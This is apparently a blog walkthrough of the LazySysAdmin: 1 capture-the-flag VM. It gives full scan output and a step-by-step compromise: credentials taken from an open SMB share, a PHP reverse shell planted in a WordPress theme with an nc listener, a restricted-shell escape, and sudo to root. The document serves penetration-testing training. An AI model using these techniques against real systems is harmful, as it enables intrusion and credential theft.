LazySysaAmin: 1 – Walkthrough

Machine Information

  • Name: LazySysaAmin: 1
  • Date release: 20 Sep 2017
  • Author: Togie Mcdogie (Twitter: @TogieMcdogie)
  • Difficulty: Beginner – Intermediate
  • Description: Boot2root created out of frustration from failing my first OSCP exam attempt.
  • Download:,205/


I ran netdiscover to find the IP of the vulnerable box.

netdiscover -i eth0 

I got the results then ran a nmap scan.

nmap -vv – Pn -sS -A -sC -p- -T 3 -script-args=unsafe=1 -oA detailed_scan -n

# Nmap 7.25BETA2 scan initiated Wed Oct 4 09:53:30 2017 as: nmap -vv - Pn -sS -A -sC -p- -T 3
 -script-args=unsafe=1 -oA detailed_scan -n
 Nmap scan report for
 Host is up, received arp-response (0.00090s latency).
 Scanned at 2017-10-04 09:53:32 EDT for 28s
 Not shown: 65529 closed ports
 Reason: 65529 resets
 22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux;
 protocol 2.0)
 | ssh-hostkey:
 | 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
 | 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL4kUdp6Gej0kmVuGrpPSUUIqYmMsiqjbZ4PFCmji
 | 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
 |_http-generator: Silex v2.2.7
 | http-methods:
 |_ Supported Methods: GET HEAD POST OPTIONS
 | http-robots.txt: 4 disallowed entries
 |_/old/ /test/ /TR2/ /Backnode_files/
 |_http-server-header: Apache/2.4.7 (Ubuntu)
 |_http-title: Backnode
 139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
 445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
 3306/tcp open mysql syn-ack ttl 64 MySQL (unauthorized)
 6667/tcp open irc syn-ack ttl 64 InspIRCd
 | irc-info:
 | server: Admin.local
 | users: 1.0
 | servers: 1
 | chans: 0
 | lusers: 1
 | lservers: 0
 | source ident: nmap
 | source host:
 |_ error: Closing link: (nmap@ [Client exited]
 MAC Address: 00:0C:29:46:BB:56 (VMware)
 Device type: general purpose
 Running: Linux 3.X|4.X
 OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
 OS details: Linux 3.2 - 4.4
 TCP/IP fingerprint:

Uptime guess: 0.004 days (since Wed Oct 4 09:48:19 2017)
 Network Distance: 1 hop
 TCP Sequence Prediction: Difficulty=263 (Good luck!)
 IP ID Sequence Generation: All zeros
 Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
 |_clock-skew: mean: -3s, deviation: 0s, median: -3s
 | nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | Names:
 | LAZYSYSADMIN<00> Flags: <unique><active>
 | LAZYSYSADMIN<03> Flags: <unique><active>
 | LAZYSYSADMIN<20> Flags: <unique><active>
 | WORKGROUP<00> Flags: <group><active>
 | WORKGROUP<1e> Flags: <group><active>
 | Statistics:
 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 |_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 | p2p-conficker:
 | Checking for Conficker.C or higher...
 | Check 1 (port 34402/tcp): CLEAN (Couldn't connect)
 | Check 2 (port 8449/tcp): CLEAN (Couldn't connect)
 | Check 3 (port 51322/udp): CLEAN (Failed to receive data)
 | Check 4 (port 50819/udp): CLEAN (Failed to receive data)
 |_ 0/4 checks are positive: Host is CLEAN or ports are blocked
 | smb-os-discovery:
 | OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
 | Computer name: lazysysadmin
 | NetBIOS computer name: LAZYSYSADMIN
 | Domain name:
 | FQDN: lazysysadmin
 |_ System time: 2017-10-04T23:53:48+10:00
 | smb-security-mode:
 | account_used: guest
 | authentication_level: user
 | challenge_response: supported
 |_ message_signing: disabled (dangerous, but default)
 |_smbv2-enabled: Server supports SMBv2 protocol

 1 0.90 ms

Post-scan script results:
 | clock-skew:
 |_ -3s: Majority of systems scanned
 Read data files from: /usr/bin/../share/nmap
 OS and Service detection performed. Please report any incorrect results at .
 # Nmap done at Wed Oct 4 09:54:00 2017 -- 1 IP address (1 host up) scanned in 31.20 seconds

I found Port 80 and Port 139,445 so I ran Nikto and Enum4linux

nikto -h -p 80

 - Nikto v2.1.6
 + Target IP:
 + Target Hostname:
 + Target Port: 80
 + Start Time: 2017-10-04 09:55:18 (GMT-4)
 + Server: Apache/2.4.7 (Ubuntu)
 + Server leaks inodes via ETags, header found with file /, fields: 0x8ce8 0x5560ea23d23c0
 + The anti-clickjacking X-Frame-Options header is not present.
 + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect
 against some forms of XSS
 + The X-Content-Type-Options header is not set. This could allow the user agent to render the
 content of the site in a different fashion to the MIME type
 + No CGI Directories found (use '-C all' to force check all possible dirs)
 + OSVDB-3268: /old/: Directory indexing found.
 + Entry '/old/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
 + OSVDB-3268: /test/: Directory indexing found.
 + Entry '/test/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
 + OSVDB-3268: /Backnode_files/: Directory indexing found.
 + Entry '/Backnode_files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
 + "robots.txt" contains 4 entries which should be manually viewed.
 + Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final
 release) and 2.2.29 are also current.
 + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
 + OSVDB-3268: /apache/: Directory indexing found.
 + OSVDB-3092: /apache/: This might be interesting...
 + OSVDB-3092: /old/: This might be interesting...
 + Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.22
 + Uncommon header 'x-ob_mode' found, with contents: 0
 + OSVDB-3092: /test/: This might be interesting...
 + /info.php: Output from the phpinfo() function was found.
 + OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found.
 This gives a lot of system information.
 + OSVDB-3233: /icons/README: Apache default file found.
 + /info.php?file= Output from the phpinfo() function was found.
 + OSVDB-5292: /info.php?file= RFI from RSnake's list
 ( or from
 + Uncommon header 'link' found, with contents: <
 rest_route=/>; rel=""
 + /wordpress/: A WordPress installation was found.
 + /phpmyadmin/: phpMyAdmin directory found
 + 7690 requests: 0 error(s) and 27 item(s) reported on remote host
 + End Time: 2017-10-04 09:56:06 (GMT-4) (48 seconds)
 + 1 host(s) tested

enum4linux -a

 Starting enum4linux v0.8.9 ( ) on Wed Oct
 4 10:57:17 2017

 | Target Information |
 Target ...........
 RID Range ........ 500-550,1000-1050
 Username ......... ''
 Password ......... ''
 Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
 | Enumerating Workgroup/Domain on |
 [+] Got domain/workgroup name: WORKGROUP

 | Nbtstat Information for |
 Looking up status of
 LAZYSYSADMIN <00> - B <ACTIVE> Workstation Service
 LAZYSYSADMIN <03> - B <ACTIVE> Messenger Service
 LAZYSYSADMIN <20> - B <ACTIVE> File Server Service
 WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
 WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

 | Session Check on |
 [+] Server allows sessions using username '', password ''

 | Getting domain SID for |
 Domain Name: WORKGROUP
 Domain Sid: (NULL SID)
 [+] Can't determine if host is part of domain or part of a workgroup

 | OS information on |
 [+] Got OS info for from smbclient: Domain=[WORKGROUP] OS=[Windows 6.1]
 Server=[Samba 4.3.11-Ubuntu]
 [+] Got OS info for from srvinfo:
 platform_id : 500
 os version : 6.1
 server type : 0x809a03

 | Users on |
 Use of uninitialized value $users in print at ./ line 874.
 Use of uninitialized value $users in pattern match (m//) at ./ line 877.

Use of uninitialized value $users in print at ./ line 888.
 Use of uninitialized value $users in pattern match (m//) at ./ line 890.

 | Share Enumeration on |
 WARNING: The "syslog" option is deprecated
 Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
 Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

Sharename Type Comment
 --------- ---- -------
 print$ Disk Printer Drivers
 share$ Disk Sumshare
 IPC$ IPC IPC Service (Web server)

Server Comment
 --------- -------

Workgroup Master
 --------- -------

[+] Attempting to map shares on
 //$ Mapping: DENIED, Listing: N/A
 //$ Mapping: OK, Listing: OK
 //$ Mapping: OK Listing: DENIED

 | Password Policy Information for |

[+] Attaching to using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

 [+] Builtin

[+] Password Info for Domain: LAZYSYSADMIN

[+] Minimum password length: 5
 [+] Password history length: None
 [+] Maximum password age: Not Set
 [+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
 [+] Domain Password Store Cleartext: 0
 [+] Domain Password Lockout Admins: 0
 [+] Domain Password No Clear Change: 0
 [+] Domain Password No Anon Change: 0
 [+] Domain Password Complex: 0

[+] Minimum password age: None
 [+] Reset Account Lockout Counter: 30 minutes
 [+] Locked Account Duration: 30 minutes
 [+] Account Lockout Threshold: None
 [+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
 Minimum Password Length: 5
 | Groups on |

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 | Users on via RID cycling (RIDS: 500-550,1000-1050) |
 [I] Found new SID: S-1-22-1
 [I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750
 [I] Found new SID: S-1-5-32
 [+] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username
 '', password ''
 S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8)
 S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)
 S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)
 [+] Enumerating users using SID S-1-5-32 and logon username '', password ''
 S-1-5-32-544 BUILTIN\Administrators (Local Group)
 S-1-5-32-545 BUILTIN\Users (Local Group)
 S-1-5-32-546 BUILTIN\Guests (Local Group)
 S-1-5-32-547 BUILTIN\Power Users (Local Group)
 S-1-5-32-548 BUILTIN\Account Operators (Local Group)
 S-1-5-32-549 BUILTIN\Server Operators (Local Group)
 S-1-5-32-550 BUILTIN\Print Operators (Local Group)
 [+] Enumerating users using SID S-1-22-1 and logon username '', password ''
 S-1-22-1-1000 Unix User\togie (Local User)

 | Getting printer info for |
 No printers returned.
 enum4linux complete on Wed Oct 4 10:58:40 2017

From the result of Nikto I found a wordpress directory /wordpress/ and phpMyAdmin /phpmyadmin/ directory.

Using enum4linux I found a share folder that allows listing and allows null session.

 //$ Mapping: OK, Listing: OK


Using the information I gathered I was able to exploit the vulnerable machine.

I used smbclient to connect and check the contents of the shared folder.

smbclient //$

Under /wordpress I found wp-config.php. (wp-config.php is a config file of wordpress it contains database name, username and password to the database)

I navigated to phpMyAdmin and used the credentials I found from wp-config.php.

Clicking on the table wp_users I encountered an error.

I used the manual query to bypass the error.

SELECT `user_login` , `user_pass` , `user_nicename` , `user_email`
 FROM wp_users

I found the username and hashed password. I ran John to crack the hashed password.

While John cracking the password I tried to log in the credentials  “Admin” as username and “TogieMYSQL12345^^” as password.

Using the credential Admin:TogieMYSQL12345^^ I was able to login to WordPress.

I navigated to Apperance>Editor to edit 404.php of twentyfifteen theme.

I copied the content of /usr/share/webshells/php/php-reverse-shell.php then edit it to set the correct IP and port.

I setup a listener using nc.

nc -nlvp 443

I ran the reverse shell by browsing into

I got low privilege shell!

I checked /etc/passwd

cat /etc/passwd

 list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
 mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false

Using username togie I tried to log in to SSH using the password I found in deets.txt. 

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

ssh togie@
Using 12345 as password and I was able to log in.

I found out that I was in restricted shell after running few commands dir and cd.

Using this command I was able to bypass the restricted shell.

python -c ‘import pty; pty.spawn(“/bin/sh”)’

I ran id and found out that togie is under sudo group.

I entered sudo su then used 12345 as password and got root.

I navigated to /root to get the proof.txt

 Well done :)

Hope you learn't a few things along the way.


Togie Mcdogie
 Enjoy some random strings





Leave a Reply

Your email address will not be published. Required fields are marked *

Check this * Time limit is exhausted. Please reload the CAPTCHA.